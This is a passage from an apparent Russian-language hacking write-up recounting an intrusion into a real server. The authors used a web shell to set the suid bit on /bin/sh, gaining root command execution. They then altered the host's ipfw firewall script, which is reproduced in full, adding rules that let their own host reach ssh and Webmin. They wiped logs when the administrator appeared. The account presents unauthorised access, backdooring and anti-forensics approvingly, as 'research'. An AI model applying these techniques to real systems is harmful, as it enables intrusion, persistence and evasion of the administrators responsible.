      <p class="style3">&#1061;&#1086;&#1090;&#1103; &#1080; &#1090;&#1091;&#1090; &#1073;&#1099;&#1083;&#1080; &#1087;&#1088;&#1086;&#1073;&#1083;&#1077;&#1084;&#1099;... &#1060;&#1072;&#1101;&#1088;&#1074;&#1086;&#1083; &#1073;&#1083;&#1086;&#1082;&#1080;&#1088;&#1086;&#1074;&#1072;&#1083; 20 &#1087;&#1086;&#1088;&#1090; &#1076;&#1083;&#1103; &#1092;&#1090;&#1087;, &#1080; &#1085;&#1072;&#1084; &#1085;&#1077; &#1091;&#1076;&#1072;&#1074;&#1072;&#1083;&#1086;&#1089;&#1100; &#1095;&#1090;&#1086; &#1083;&#1080;&#1073;&#1086; &#1079;&#1072;&#1083;&#1080;&#1090;&#1100; &#1085;&#1072; &#1093;&#1086;&#1089;&#1090;, &#1053;&#1054;... &#1050;&#1086;&#1084;&#1072;&#1085;&#1076;&#1072; chmod &#1088;&#1072;&#1073;&#1086;&#1090;&#1072;&#1083;&#1072; &#1079;&#1072;&#1084;&#1077;&#1095;&#1072;&#1090;&#1077;&#1083;&#1100;&#1085;&#1086;. &#1055;&#1086;&#1089;&#1083;&#1077; &#1085;&#1077;&#1089;&#1082;&#1086;&#1083;&#1100;&#1082;&#1080;&#1093; &#1074;&#1072;&#1088;&#1080;&#1072;&#1094;&#1080;&#1081; &#1085;&#1072; &#1090;&#1077;&#1084;&#1091; &#1073;&#1101;&#1082;&#1082;&#1086;&#1085;&#1077;&#1082;&#1090;&#1072;, &#1089;&#1091;&#1080;&#1076;&#1076;&#1085;&#1099;&#1093; &#1073;&#1080;&#1085;&#1072;&#1088;&#1085;&#1080;&#1082;&#1086;&#1074; &#1080; &#1090;.&#1087;, &#1084;&#1099; &#1086;&#1089;&#1090;&#1072;&#1085;&#1086;&#1074;&#1080;&#1083;&#1080;&#1089;&#1100; &#1085;&#1072; &#1090;&#1086;&#1084;, &#1095;&#1090;&#1086; &#1087;&#1086;&#1089;&#1090;&#1072;&#1074;&#1080;&#1083;&#1080; &#1085;&#1072; /bin/sh &#1089;&#1091;&#1080;&#1076; &#1073;&#1080;&#1090; (chmod +s), &#1080; &#1087;&#1086;&#1083;&#1091;&#1095;&#1080;&#1083;&#1080; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1100; &#1095;&#1077;&#1088;&#1077;&#1079; web-shell &#1074;&#1099;&#1087;&#1086;&#1083;&#1085;&#1103;&#1090;&#1100; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087;&#1085;&#1099;&#1077; &#1090;&#1086;&#1083;&#1100;&#1082;&#1086; &#1088;&#1091;&#1090;&#1091; :-))...</p>
      <p align="center"><img src="img/2-uz.gif" width="551" height="353" border="1"></p>
      <p> <br>
        <span class="style3">&#1055;&#1086; &#1087;&#1088;&#1077;&#1078;&#1085;&#1077;&#1084;&#1091; &#1090;&#1088;&#1077;&#1073;&#1086;&#1074;&#1072;&#1083;&#1089;&#1103; &#1085;&#1086;&#1088;&#1084;&#1072;&#1083;&#1100;&#1085;&#1099;&#1081; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087;, &#1080; &#1090;&#1086;&#1083;&#1100;&#1082;&#1086; &#1090;&#1091;&#1090; &#1084;&#1099; &#1088;&#1077;&#1096;&#1080;&#1083;&#1080; &#1087;&#1086;&#1074;&#1085;&#1080;&#1084;&#1072;&#1090;&#1077;&#1083;&#1100;&#1085;&#1077;&#1077; &#1087;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088;&#1077;&#1090;&#1100; &#1095;&#1090;&#1086; &#1090;&#1072;&#1084; &#1079;&#1072; &#1092;&#1072;&#1101;&#1088;&#1074;&#1086;&#1083;&#1083;... &#1054;&#1082;&#1072;&#1079;&#1072;&#1083;&#1086;&#1089;&#1100; &#1095;&#1090;&#1086; &#1085;&#1072;&#1073;&#1086;&#1088; &#1087;&#1088;&#1072;&#1074;&#1080;&#1083; &quot;OPEN&quot;, &#1073;&#1099;&#1083; &#1082;&#1072;&#1088;&#1076;&#1080;&#1085;&#1072;&#1083;&#1100;&#1085;&#1086; &#1087;&#1077;&#1088;&#1077;&#1088;&#1072;&#1073;&#1086;&#1090;&#1072;&#1085; &#1072;&#1076;&#1084;&#1080;&#1085;&#1086;&#1084;, &#1080; &#1090;&#1072;&#1084; &#1086;&#1089;&#1090;&#1072;&#1083;&#1080;&#1089;&#1100; &#1090;&#1086;&#1083;&#1100;&#1082;&#1086; &#1077;&#1075;&#1086; &#1087;&#1088;&#1072;&#1074;&#1080;&#1083;&#1072; &#1089; &#1087;&#1086;&#1103;&#1089;&#1085;&#1077;&#1085;&#1080;&#1103;&#1084;&#1080;. &#1063;&#1077;&#1088;&#1077;&#1079; &#1074;&#1101;&#1073;-&#1096;&#1077;&#1083;&#1083;, &#1084;&#1099; &#1087;&#1077;&#1088;&#1077;&#1076;&#1077;&#1083;&#1072;&#1083;&#1080; &#1087;&#1088;&#1072;&#1074;&#1080;&#1083;&#1072;, &#1076;&#1086;&#1073;&#1072;&#1074;&#1080;&#1074; &#1087;&#1072;&#1088;&#1086;&#1095;&#1082;&#1091;, &#1087;&#1077;&#1088;&#1077;&#1079;&#1072;&#1083;&#1080;&#1083;&#1080; &#1080;&#1093;, &#1080; &#1088;&#1077;&#1089;&#1090;&#1072;&#1088;&#1090;&#1072;&#1085;&#1091;&#1083;&#1080; &#1092;&#1072;&#1101;&#1088; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1086;&#1081;<br>
  /etc/netstart.<br>
&#1042;&#1086;&#1090; &#1082;&#1072;&#1082; &#1086;&#1085;&#1080; &#1089;&#1090;&#1072;&#1083;&#1080; &#1074;&#1099;&#1075;&#1083;&#1103;&#1076;&#1077;&#1090;&#1100;:</span><br>
  <!--c1-->
      </p>
      <table border="0" align="center" width="95%" cellpadding="0" cellspacing="0">
        <tr>
          <td><b>Code Sample</b> </td>
        </tr>
        <tr>
          <td bgcolor="#FFFFFF" id="CODE"><!--ec1-->
              <br>
              <span class="style4">#&#33;/bin/sh -<br>
              <br>
              fwcmd=&#34;ipfw -q&#34;<br>
              <br>
              # &#1057;&#1073;&#1088;&#1072;&#1089;&#1099;&#1074;&#1072;&#1077;&#1084; &#1074;&#1089;&#1077; &#1087;&#1088;&#1072;&#1074;&#1080;&#1083;&#1072; ----------------------------------------------------------------------<br>
&#036;{fwcmd} -f flush<br>
      <br>
      # &#1054;&#1087;&#1080;&#1089;&#1099;&#1074;&#1072;&#1077;&#1084; &#1087;&#1077;&#1088;&#1077;&#1084;&#1077;&#1085;&#1085;&#1099;&#1077;<br>
      # &#1055;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1080; &#1089; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087;&#1086;&#1084; &#1074; &#1080;&#1085;&#1090;&#1077;&#1088;&#1085;&#1077;&#1090; ----------------------------------------------------------<br>
      alf=&#34;3,4&#34;<br>
      <br>
      # &#1042;&#1085;&#1077;&#1096;&#1085;&#1080;&#1081; &#1080;&#1085;&#1090;&#1077;&#1088;&#1092;&#1077;&#1081;&#1089; 1 -------------------------------------------------------------------------<br>
      oif1=&#34;ipln0&#34;<br>
      onet1=&#34;212.12.13.128&#34;<br>
      omask1=&#34;255.255.255.192&#34;<br>
      obits1=&#34;26&#34;<br>
      oip1=&#34;212.12.13.145&#34;<br>
      <br>
      # &#1042;&#1085;&#1091;&#1090;&#1088;&#1077;&#1085;&#1085;&#1080;&#1081; &#1080;&#1085;&#1090;&#1077;&#1088;&#1092;&#1077;&#1081;&#1089; ------------------------------------------------------------------------<br>
      iif1=&#34;rl0&#34;<br>
      inet=&#34;192.168.0.0&#34;<br>
      imask=&#34;255.255.224.0&#34;<br>
      ibits=&#34;19&#34;<br>
      <br>
      vpnif=&#34;ng*&#34;<br>
      <br>
      ##################################### &#1055;&#1056;&#1040;&#1042;&#1048;&#1051;&#1040; &#036;{fwcmd} ########################################<br>
      <br>
      # &#1057;&#1095;&#1077;&#1090;&#1095;&#1080;&#1082;&#1080; ------------------------------------------------------------------------------------<br>
&#036;{fwcmd} add 4100 count all from any to any in recv &#036;{oif1}<br>
&#036;{fwcmd} add 4200 count all from 212.12.0.0/19 to any in recv &#036;{oif1}<br>
      <br>
      # &#1041;&#1083;&#1086;&#1082;&#1080;&#1088;&#1086;&#1074;&#1082;&#1080; fake-lo --------------------------------------------------------------------------<br>
&#036;{fwcmd} add 4300 pass all from any to any via lo0<br>
&#036;{fwcmd} add 4400 deny all from any to 127.0.0.0/8<br>
&#036;{fwcmd} add 4500 deny ip from 127.0.0.0/8 to any<br>
      <br>
      # Stop spoofing -------------------------------------------------------------------------------<br>
&#036;{fwcmd} add 4600 deny all from &#036;{inet}&#58;&#036;{imask} to any in via &#036;{oif1}<br>
&#036;{fwcmd} add 4700 deny all from &#036;{onet1}&#58;&#036;{omask1} to any in via &#036;{iif1}<br>
      <br>
      # &#1044;&#1083;&#1103; &#1074;&#1093;&#1086;&#1076;&#1103;&#1097;&#1080;&#1093; VPN-&#1082;&#1083;&#1080;&#1077;&#1085;&#1090;&#1086;&#1074; - &#1047;&#1040;&#1055;&#1056;&#1045;&#1065;&#1040;&#1045;&#1052; &#1042;&#1057;&#1045; ---------------------------------------------------<br>
&#036;{fwcmd} add 4800 deny log all from 192.168.2.0/24 to any out xmit &#036;{oif1}<br>
      <br>
      # &#1053;&#1072;&#1089;&#1090;&#1088;&#1086;&#1081;&#1082;&#1072; NAT -- Divert ---------------------------------------------------------------------<br>
&#036;{fwcmd} add 4900 divert 8868 all from any to &#036;{oip1} in recv &#036;{oif1}<br>
&#036;{fwcmd} add 5000 divert 8868 all from &#036;{inet}&#58;&#036;{imask} to any recv &#036;{vpnif} out xmit &#036;{oif1}<br>
      <br>
      # &#1056;&#1072;&#1079;&#1088;&#1077;&#1096;&#1072;&#1077;&#1084; &#1074;&#1089;&#1077; &#1089;&#1086;&#1077;&#1076;&#1080;&#1085;&#1077;&#1085;&#1080;&#1103;, &#1082;&#1086;&#1090;&#1086;&#1088;&#1099;&#1077; &#1080;&#1084;&#1077;&#1102;&#1090; &#1087;&#1086;&#1089;&#1090;&#1088;&#1086;&#1077;&#1085;&#1085;&#1099;&#1077; &#1076;&#1083;&#1103; &#1085;&#1080;&#1093; &#1076;&#1080;&#1085;&#1072;&#1084;&#1080;&#1095;&#1077;&#1089;&#1082;&#1080;&#1077; &#1087;&#1088;&#1072;&#1074;&#1080;&#1083;&#1072;<br>
&#036;{fwcmd} add 5100 check-state<br>
      <br>
      ####################### &#1048;&#1089;&#1082;&#1083;&#1102;&#1095;&#1077;&#1085;&#1080;&#1103; ############################################################<br>
      #&#036;{fwcmd} add 5200 divert 8868 all from &#036;{inet}/24{&#036;{alf}} to any recv &#036;{iif1} out xmit &#036;{oif1}<br>
      #&#036;{fwcmd} add 5300 allow all from &#036;{inet}/24{&#036;{alf}} to any<br>
      #&#036;{fwcmd} add 5400 allow all from any to &#036;{inet}/24{&#036;{alf}}<br>
&#036;{fwcmd} add 5300 allow all from 195.239.133.106 to &#036;{oip1}<br>
&#036;{fwcmd} add 5400 allow all from &#036;{oip1} to 195.239.133.106<br>
      <br>
      # &#1056;&#1072;&#1079;&#1088;&#1077;&#1096;&#1077;&#1085;&#1080;&#1077; &#1087;&#1080;&#1085;&#1075;&#1086;&#1074;&#1072;&#1090;&#1100; &#1089; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1072; &#1074;&#1089;&#1077; &#1087;&#1086;&#1076;&#1088;&#1103;&#1076; ---------------------------------------------------<br>
&#036;{fwcmd} add 5500 pass udp from me to any 33434-33523<br>
&#036;{fwcmd} add 5600 allow icmp from me to any keep-state<br>
      <br>
      # ICMP Filter ---------------------------------------------------------------------------------<br>
      # &#1047;&#1072;&#1087;&#1088;&#1077;&#1097;&#1072;&#1077;&#1084; &#1087;&#1088;&#1086;&#1093;&#1086;&#1078;&#1076;&#1077;&#1085;&#1080;&#1077; &#1092;&#1088;&#1072;&#1075;&#1084;&#1077;&#1085;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1085;&#1085;&#1099;&#1093; &#1087;&#1072;&#1082;&#1077;&#1090;&#1086;&#1074; ---------------------------------------------<br>
&#036;{fwcmd} add 5700 deny icmp from any to any frag<br>
      <br>
      # &#1056;&#1072;&#1079;&#1088;&#1077;&#1096;&#1072;&#1077;&#1084; &#1087;&#1088;&#1086;&#1093;&#1086;&#1078;&#1076;&#1077;&#1085;&#1080;&#1077; ICMP &#1087;&#1072;&#1082;&#1077;&#1090;&#1086;&#1074; ----------------------------------------------------------<br>
&#036;{fwcmd} add 5800 pass ICMP from any to me<br>
      <br>
      # ssh -----------------------------------------------------------------------------------------<br>
      #- &#1056;&#1072;&#1079;&#1088;&#1077;&#1096;&#1072;&#1077;&#1084; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087; &#1076;&#1083;&#1103; &#1076;&#1086;&#1074;&#1077;&#1088;&#1077;&#1085;&#1085;&#1099;&#1093; &#1093;&#1086;&#1089;&#1090;&#1086;&#1074;<br>
&#036;{fwcmd} add 5900 allow tcp from 195.239.133.106 to &#036;{oip1} ssh<br>
      <strong>&#036;{fwcmd} add 5950 allow tcp from xx.x.x.x to &#036;{oip1} ssh</strong># &#1085;&#1072;&#1096; &#1088;&#1091;&#1083;&#1077;&#1089;<br>
&#036;{fwcmd} add 6000 allow tcp from &#036;{oip1} ssh to 195.239.133.106<br>
&#036;{fwcmd} add 6100 allow tcp from &#036;{inet}/24{&#036;{alf}} to me ssh<br>
&#036;{fwcmd} add 6200 allow tcp from me ssh to &#036;{inet}/24{&#036;{alf}}<br>
#- &#1054;&#1089;&#1090;&#1072;&#1083;&#1100;&#1085;&#1099;&#1093; &#1087;&#1086;&#1089;&#1099;&#1083;&#1072;&#1077;&#1084;<br>
&#036;{fwcmd} add 6300 deny log tcp from any to me ssh,telnet<br>
      <br>
      # Webmin &#1080; &#1087;&#1088;&#1086;&#1095;&#1077;&#1077; &nbsp;----------------------------------------------------------------------------<br>
      # &#1056;&#1072;&#1079;&#1088;&#1077;&#1096;&#1072;&#1077;&#1084; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087; &#1076;&#1083;&#1103; &#1076;&#1086;&#1074;&#1077;&#1088;&#1077;&#1085;&#1085;&#1099;&#1093; &#1093;&#1086;&#1089;&#1090;&#1086;&#1074; ------------------------------------------------------<br>
&#036;{fwcmd} add 6400 allow tcp from 195.239.133.106 to &#036;{oip1} 5001,8010,10000,11758<br>
      <strong>&#036;{fwcmd} add 6450 allow tcp from xx.x.x.x to &#036;{oip1} 5001,8010,10000,11758</strong># &#1077;&#1097;&#1077; &#1086;&#1076;&#1080;&#1085; <br>
&#036;{fwcmd} add 6500 allow tcp from &#036;{oip1} 5001,8010,10000,11758 to 195.239.133.106<br>
&#036;{fwcmd} add 6600 allow tcp from &#036;{inet}/24{&#036;{alf}} to &#036;{oip1} 5001,8010,10000,11758<br>
&#036;{fwcmd} add 6700 allow tcp from &#036;{oip1} 5001,8010,10000,11758 to &#036;{inet}/24{&#036;{alf}}<br>
#- &#1054;&#1089;&#1090;&#1072;&#1083;&#1100;&#1085;&#1099;&#1093; &#1087;&#1086;&#1089;&#1099;&#1083;&#1072;&#1077;&#1084; -------------------------------------------------------------------------<br>
&#036;{fwcmd} add 6800 deny log tcp from any to me 5001,8010,10000<br>
      <br>
      # DC HUB &nbsp;------------------------------------------------------------------------------------<br>
      -<br>
&#036;{fwcmd} add 6900 allow tcp from 212.12.0.0/19 to &#036;{oip1} 411<br>
&#036;{fwcmd} add 7000 allow tcp from &#036;{oip1} 411 to 212.12.0.0/19<br>
&#036;{fwcmd} add 7100 allow tcp from 195.239.133.106 to &#036;{oip1} 411<br>
&#036;{fwcmd} add 7200 allow tcp from &#036;{oip1} 411 to 195.239.133.106<br>
&#036;{fwcmd} add 7300 allow tcp from &#036;{inet}&#58;&#036;{imask} to me 411<br>
&#036;{fwcmd} add 7400 allow tcp from me 411 to &#036;{inet}&#58;&#036;{imask}<br>
#- &#1054;&#1089;&#1090;&#1072;&#1083;&#1100;&#1085;&#1099;&#1093; &#1087;&#1086;&#1089;&#1099;&#1083;&#1072;&#1077;&#1084;<br>
&#036;{fwcmd} add 7500 deny tcp from any to me 411<br>
      <br>
      # Allow TCP setup from me ---------------------------------------------------------------------<br>
&#036;{fwcmd} add 9100 allow tcp from me to any keep-state via &#036;{oif1}<br>
      <br>
      # Allow DNS queries out in the world ----------------------------------------------------------<br>
&#036;{fwcmd} add 9200 pass { tcp or udp } from me to any domain keep-state<br>
&#036;{fwcmd} add 9300 pass { tcp or udp } from any domain to me<br>
      <br>
      # Allow NTP queries out in the world ----------------------------------------------------------<br>
&#036;{fwcmd} add 9400 pass { tcp or udp } from me to any ntp<br>
&#036;{fwcmd} add 9500 pass { tcp or udp } from any ntp to me<br>
      <br>
      # VPN Server ----------------------------------------------------------------------------------<br>
&#036;{fwcmd} add 9600 allow TCP from any to me 1723<br>
&#036;{fwcmd} add 9700 allow TCP from me 1723 to any<br>
&#036;{fwcmd} add 9800 allow GRE from any to me<br>
&#036;{fwcmd} add 9900 allow GRE from me to any<br>
      <br>
      # Allow access to our DNS ---------------------------------------------------------------------<br>
&#036;{fwcmd} add 10000 pass { tcp or udp } from any to me domain<br>
&#036;{fwcmd} add 10100 pass { tcp or udp } from me domain to any<br>
      <br>
      # Allow NTP queries to me from the world ------------------------------------------------------<br>
&#036;{fwcmd} add 10200 pass { tcp or udp } from any to me ntp<br>
&#036;{fwcmd} add 10300 pass { tcp or udp } from me ntp to any<br>
      <br>
      # &#1088;&#1086;&#1088;&#1047; ----------------------------------------------------------------------------------------<br>
&#036;{fwcmd} add 10400 allow tcp from any to &#036;{oip1} pop3<br>
&#036;{fwcmd} add 10500 allow tcp from &#036;{oip1} pop3 to any<br>
      <br>
      # Allow setup of incoming email ---------------------------------------------------------------<br>
&#036;{fwcmd} add 10600 pass tcp from any to &#036;{oip1} smtp setup<br>
&#036;{fwcmd} add 10700 pass tcp from &#036;{oip1} smtp to any<br>
      <br>
      # CommuniGate Pro &nbsp;----------------------------------------------------------------------------<br>
&#036;{fwcmd} add 10800 allow tcp from any to &#036;{oip1} 8100<br>
&#036;{fwcmd} add 10900 allow tcp from &#036;{oip1} 8100 to any<br>
      <br>
      # Vypress Chat --------------------------------------------------------------------------------<br>
&#036;{fwcmd} add 11000 allow UDP from any to any 8167<br>
      <br>
      # Allow TCP through if setup succeeded --------------------------------------------------------<br>
&#036;{fwcmd} add 11100 pass tcp from any to any established<br>
      <br>
      # Allow IP fragments to pass through ----------------------------------------------------------<br>
&#036;{fwcmd} add 11200 pass all from any to any frag<br>
      <br>
&#036;{fwcmd} add 11300 allow tcp from any to me http,443 setup<br>
&#036;{fwcmd} add 11400 allow tcp from me http,443 to any<br>
      <br>
      # ftp -----------------------------------------------------------------------------------------<br>
&#036;{fwcmd} add 11500 allow tcp from any to me ftp&#92;&#92;-data-ftp setup<br>
&#036;{fwcmd} add 11600 allow tcp from me ftp&#92;&#92;-data-ftp to any<br>
      <br>
      # ICQ -----------------------------------------------------------------------------------------<br>
&#036;{fwcmd} add 11700 allow log tcp from 212.12.0.0/19 to &#036;{oip1} 4000,5190<br>
&#036;{fwcmd} add 11800 allow tcp from &#036;{oip1} 4000,5190 to 212.12.0.0/19<br>
&#036;{fwcmd} add 11900 allow tcp from 195.239.133.0/24 to &#036;{oip1} 4000,5190<br>
&#036;{fwcmd} add 12000 allow tcp from &#036;{oip1} 4000,5190 to 195.239.133.0/32<br>
&#036;{fwcmd} add 12100 allow tcp from 195.239.134.0/24 to &#036;{oip1} 4000,5190<br>
&#036;{fwcmd} add 12200 allow tcp from &#036;{oip1} 4000,5190 to 195.239.134.0/32<br>
&#036;{fwcmd} add 12300 allow tcp from &#036;{inet}&#58;&#036;{imask} to me 4000,5190<br>
&#036;{fwcmd} add 12400 allow tcp from me 4000,5190 to &#036;{inet}&#58;&#036;{imask}<br>
#- &#1054;&#1089;&#1090;&#1072;&#1083;&#1100;&#1085;&#1099;&#1093; &#1087;&#1086;&#1089;&#1099;&#1083;&#1072;&#1077;&#1084;<br>
&#036;{fwcmd} add 12500 deny log tcp from any to me 4000,5190<br>
      <br>
      # SQUID ---------------------------------------------------------------------------------------<br>
      # &#1056;&#1072;&#1079;&#1088;&#1077;&#1096;&#1072;&#1077;&#1084; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087; &#1082; Squid<br>
&#036;{fwcmd} add 12600 deny log tcp from 192.168.2.0/24 to me 3128 in recv &#036;{vpnif}<br>
&#036;{fwcmd} add 12700 allow tcp from &#036;{inet}&#58;&#036;{imask} to me 3128 in recv &#036;{vpnif}<br>
#&#036;{fwcmd} add 12700 allow tcp from me 3128 to &#036;{inet}&#58;&#036;{imask} out xmit &#036;{vpnif}<br>
# &#1047;&#1072;&#1087;&#1088;&#1077;&#1097;&#1072;&#1077;&#1084; Squid &#1076;&#1083;&#1103; &#1074;&#1089;&#1077;&#1093; &#1087;&#1088;&#1086;&#1095;&#1080;&#1093;<br>
&#036;{fwcmd} add 12800 deny log tcp from any to me 3128<br>
      <br>
      # Allow DHCP queries to me &nbsp;-------------------------------------------------------------------<br>
&#036;{fwcmd} add 12900 pass udp from any 68 to any 67 in recv &#036;{iif1}<br>
&#036;{fwcmd} add 13000 pass udp from me 67 to any 68<br>
      <br>
&#036;{fwcmd} add 13100 pass all from &#036;{inet}&#58;&#036;{imask} to &#036;{inet}&#58;&#036;{imask}<br>
      <br>
&#036;{fwcmd} add 13300 allow all from &#036;{inet}&#58;&#036;{imask} to any in recv &#036;{vpnif}<br>
&#036;{fwcmd} add 13400 allow all from any to &#036;{inet}&#58;&#036;{imask}<br>
      <br>
      # &#1054;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1077; BANDWIDTH -----------------------------------------------------------------------<br>
      #&#036;{fwcmd} pipe 1 config bw 100Mbit/s<br>
      #&#036;{fwcmd} pipe 2 config bw 256Kbit/s<br>
      #&#036;{fwcmd} add pipe 1 all from &#036;{inet}&#58;&#036;{imask} to me in<br>
      #&#036;{fwcmd} add pipe 1 all from me to &#036;{inet}&#58;&#036;{imask} out<br>
      #&#036;{fwcmd} add pipe 1 all from &#036;{inet}&#58;&#036;{imask} to &#036;{inet}&#58;&#036;{imask}<br>
      #&#036;{fwcmd} add pipe 2 all from &#036;{inet}&#58;&#036;{imask} to any in recv &#036;{vpnif}<br>
      #&#036;{fwcmd} add pipe 2 all from any to &#036;{inet}&#58;&#036;{imask}<br>
      <br>
      # &#1042;&#1089;&#1077; &#1086;&#1089;&#1090;&#1072;&#1083;&#1100;&#1085;&#1086;&#1077; &#1087;&#1086;&#1089;&#1099;&#1083;&#1072;&#1077;&#1084; ----------------------------------------------------------------------<br>
&#036;{fwcmd} add 15000 deny log logamount 100000 all from any to any </span><br>
      <!--c2--></td>
        </tr>
      </table>
      <!--ec2-->
      <p><br>
        <span class="style3">&#1042;&#1089;&#1077; - &#1090;&#1077;&#1087;&#1077;&#1088;&#1100; &#1089;&#1087;&#1086;&#1082;&#1086;&#1081;&#1085;&#1099;&#1081; &#1082;&#1086;&#1085;&#1085;&#1077;&#1082;&#1090; &#1087;&#1086; ssh &#1080; &#1087;&#1088;&#1080;&#1074;&#1077;&#1083;&#1077;&#1075;&#1080;&#1103; &#1088;&#1091;&#1090;&#1072;...<br>
&#1055;&#1086;&#1089;&#1083;&#1077; &#1082;&#1086;&#1085;&#1085;&#1077;&#1082;&#1090;&#1072; &#1086;&#1073;&#1085;&#1072;&#1088;&#1091;&#1078;&#1080;&#1083;&#1086;&#1089;&#1100; &#1095;&#1090;&#1086; &#1072;&#1076;&#1084;&#1080;&#1085; &#1091;&#1078;&#1077; &#1089;&#1080;&#1076;&#1080;&#1090; &#1085;&#1072; &#1096;&#1077;&#1083;&#1077;, &#1095;&#1090;&#1086; &#1085;&#1072;&#1089; &#1089;&#1083;&#1077;&#1075;&#1082;&#1072; &#1085;&#1072;&#1087;&#1088;&#1103;&#1075;&#1083;&#1086;... &#1050;&#1072;&#1082; &#1085;&#1072;&#1079;&#1083;&#1086; &#1074;&#1088;&#1077;&#1084;&#1077;&#1085;&#1080; &#1091;&#1078;&#1077; &#1085;&#1077; &#1073;&#1099;&#1083;&#1086; &#1085;&#1072; &#1090;&#1086; &#1095;&#1090;&#1086;&#1073;&#1099; &#1079;&#1072;&#1082;&#1088;&#1077;&#1087;&#1080;&#1090;&#1100;&#1089;&#1103; &#1086;&#1089;&#1085;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1100;&#1085;&#1086;, &#1085;&#1072;&#1076;&#1086; &#1073;&#1099;&#1083;&#1086; &#1088;&#1072;&#1079;&#1073;&#1077;&#1075;&#1072;&#1090;&#1089;&#1103; &#1087;&#1086; &#1083;&#1080;&#1095;&#1085;&#1099;&#1084; &#1076;&#1077;&#1083;&#1072;&#1084;, &#1080; &#1084;&#1099; &#1089;&#1083;&#1077;&#1075;&#1082;&#1072; &#1087;&#1086;&#1090;&#1077;&#1088;&#1083;&#1080; &#1090;&#1086;&#1083;&#1100;&#1082;&#1086; &#1085;&#1077;&#1082;&#1086;&#1090;&#1086;&#1088;&#1099;&#1077; &#1090;&#1077;&#1082;&#1089;&#1090;&#1086;&#1074;&#1099;&#1077; &#1083;&#1086;&#1075;&#1080;, &#1087;&#1088;&#1080; &#1101;&#1090;&#1086;&#1084; &#1072;&#1076;&#1084;&#1080;&#1085; &#1089; &#1096;&#1077;&#1083;&#1083;&#1072; &#1087;&#1088;&#1086;&#1087;&#1072;&#1083;, &#1080; &#1084;&#1099; &#1088;&#1077;&#1096;&#1080;&#1083;&#1080; &#1095;&#1090;&#1086; &#1079;&#1072;&#1082;&#1088;&#1077;&#1087;&#1080;&#1084;&#1089;&#1103; &#1087;&#1086;&#1087;&#1086;&#1079;&#1078;&#1077;, &#1080; &#1095;&#1090;&#1086; &#1072;&#1076;&#1084;&#1080;&#1085; &#1085;&#1080;&#1095;&#1077;&#1075;&#1086; &#1085;&#1077; &#1087;&#1088;&#1086;&#1087;&#1072;&#1083;&#1080;&#1083;.<br>
&#1053;&#1086; &#1084;&#1099; &#1086;&#1096;&#1080;&#1073;&#1083;&#1080;&#1089;&#1100;, &#1074;&#1077;&#1095;&#1077;&#1088;&#1086;&#1084; &#1086;&#1082;&#1072;&#1079;&#1072;&#1083;&#1086;&#1089;&#1100; &#1095;&#1090;&#1086; &#1072;&#1076;&#1084;&#1080;&#1085; &#1087;&#1086;&#1090;&#1077;&#1088; &#1074;&#1089;&#1077; &#1085;&#1072;&#1096;&#1080; remview &#1080; &#1096;&#1077;&#1083;&#1083;&#1099;, &#1074;&#1077;&#1088;&#1085;&#1091;&#1083; &#1087;&#1088;&#1072;&#1074;&#1080;&#1083;&#1072; IPFW &#1074; &#1080;&#1089;&#1093;&#1086;&#1076;&#1085;&#1086;&#1077; &#1089;&#1086;&#1089;&#1090;&#1086;&#1103;&#1085;&#1080;&#1077; &#1080; &#1089;&#1084;&#1077;&#1085;&#1080;&#1083; &#1087;&#1072;&#1088;&#1086;&#1083;&#1100; &#1088;&#1091;&#1090;&#1091;. &#1044;&#1086;&#1089;&#1090;&#1091;&#1087; &#1073;&#1099;&#1083; &#1087;&#1086;&#1090;&#1077;&#1088;&#1103;&#1085;, &#1085;&#1086; &#1090;&#1077;&#1084; &#1085;&#1077; &#1084;&#1077;&#1085;&#1077;&#1077; - &#1072;&#1076;&#1084;&#1080;&#1085; &#1086;&#1095;&#1077;&#1085;&#1100; &#1088;&#1080;&#1089;&#1082;&#1086;&#1074;&#1072;&#1083;. &#1061;&#1086;&#1090;&#1103; &#1084;&#1099; &#1080; &#1085;&#1077; &#1089;&#1086;&#1073;&#1080;&#1088;&#1072;&#1083;&#1080;&#1089;&#1100; &#1087;&#1088;&#1080;&#1085;&#1080;&#1084;&#1072;&#1090;&#1100; &#1085;&#1080;&#1082;&#1072;&#1082;&#1080;&#1093; &#1076;&#1077;&#1089;&#1090;&#1088;&#1091;&#1082;&#1090;&#1080;&#1074;&#1085;&#1099;&#1093; &#1076;&#1077;&#1081;&#1089;&#1090;&#1074;&#1080;&#1081;, &#1090;&#1086;&#1083;&#1100;&#1082;&#1086; &#1080;&#1089;&#1089;&#1083;&#1077;&#1076;&#1086;&#1074;&#1072;&#1085;&#1080;&#1077;. </span></p>
